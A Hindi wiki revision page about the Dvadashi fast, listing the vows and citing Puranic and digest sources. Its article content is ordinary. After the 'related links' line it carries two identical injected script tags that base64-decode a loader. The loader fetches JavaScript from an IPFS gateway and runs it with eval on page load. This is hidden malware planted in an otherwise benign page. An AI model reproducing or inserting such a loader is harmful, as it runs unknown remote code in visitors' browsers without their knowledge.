आदित्य चौधरी (वार्ता | योगदान) छो (Text replace - "उल्लखित" to "उल्लिखित") |
व्यवस्थापन (वार्ता | योगदान) छो (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==") |
||
पंक्ति 7: | पंक्ति 7: | ||
*'युग्मवाक्य'<ref>कालनिर्णय 275</ref> के मत से [[एकादशी]] से युक्त द्वादशी अच्छी मानी जाती है। | *'युग्मवाक्य'<ref>कालनिर्णय 275</ref> के मत से [[एकादशी]] से युक्त द्वादशी अच्छी मानी जाती है। | ||
{{संदर्भ ग्रंथ}} | |||
==टीका टिप्पणी और संदर्भ== | ==टीका टिप्पणी और संदर्भ== | ||
<references/> | <references/> |
08:04, 21 मार्च 2011 का अवतरण
- भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित हिन्दू धर्म का एक व्रत संस्कार है।
- मार्गशीर्ष शुक्ल पक्ष एवं कृष्ण पक्ष की द्वादशी पर उपवास करने से पुण्य होता है।[1]
- कुल लगभग 50 द्वादशीव्रत हैं।[2]
- वराह पुराण[3] ने दस अवतारों (मत्स्य से कल्कि तक) के नामों पर 10 द्वादशियों का उल्लेख किया है।
- अग्नि पुराण[4] ने कई द्वादशियों का उल्लेख किया है।
- हेमाद्रि[5] ने ब्रह्मवैवर्त से आठ प्रकार की द्वादशियों का उद्धरण दिया है।[6]
- 'युग्मवाक्य'[7] के मत से एकादशी से युक्त द्वादशी अच्छी मानी जाती है।
टीका टिप्पणी और संदर्भ
- ↑ विष्णुधर्मोत्तरपुराण (1|151|1-21 एवं 1|160)
- ↑ कृत्यकल्पतरु (व्रत0, 310-369); हेमाद्रि (व्रत0 1, 1162-1222); हेमाद्रि (काल, 289-298); कालनिर्णय (275-277); तिथितत्त्व (114-117); समयमयूख (92-95); पुरुषार्थचिन्तामणि (213-222), व्रतराज (475-495)।
- ↑ वराह पुराण, अध्याय 39-49
- ↑ अग्निपुराण (188)
- ↑ हेमाद्रि (काल॰ 260-263)
- ↑ देखिए गत अध्याय 5); और देखिए हेमाद्रि (काल0634-637), कृत्यरत्नाकर (129-131)।
- ↑ कालनिर्णय 275
अन्य संबंधित लिंक
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>